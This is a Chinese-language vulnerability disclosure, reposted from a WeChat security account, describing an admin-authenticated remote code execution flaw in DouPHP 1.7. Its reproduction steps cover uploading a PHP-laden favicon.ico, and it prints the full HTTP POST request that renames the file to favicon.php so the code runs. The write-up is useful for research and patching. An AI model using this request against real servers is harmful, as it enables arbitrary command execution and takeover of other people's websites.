漏洞描述
DouPHP是一个开源的PHP开发框架,广泛应用于快速开发Web应用。其设计目标是简单、快速、灵活、安全。
DouPHP 1.7Release20220822版本中存在一个远程代码执行(RCE)漏洞。拥有管理员权限的攻击者可以通过该漏洞在服务器上执行任意命令。漏洞通过上传恶意文件、修改文件扩展名以及通过构造特定的数据包来执行PHP代码。
漏洞复现
1、 登录管理员后台。
2、 上传恶意文件
3、 上传一个包含php代码的ico图标
上传成功:
4、把上传的favicon.ico文件修改为favicon.php,从而执行php代码。
抓取数据包,进行修改文件名操作
POST /cache/custom_admin_path.candel.php HTTP/1.1
Host: douphp:84
User-Agent:Mozilla/5.0(Windows NT 10.0;Win64; x64; rv:128.0)Gecko/20100101Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:109
Origin: http://douphp:84
Connection: close
Referer: http://douphp:84/admin/tool.php?rec=custom_admin_path
Cookie: PHPSESSID=bl1s095coldq9mc4a2d9ivrgki
Upgrade-Insecure-Requests:1
Priority: u=0, i
new_path=favicon.php&old_path=favicon.ico&ryjwoi=278144&root_url=http%3A%2F%2Fdouphp%3A84%2F&submit=%E6%8F%90%E4%BA%A4
访问对应的恶意文件路径:http://{你的url地址}/favicon.php
attachment/2024/08/d773107c-726b-4f24-a0b7-4aff6cf98e48-weAxeCnx.docx
原文始发于微信公众号(安全之眼SecEye):【0day】DouPHP 1.7 Release 20220822 远程代码执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论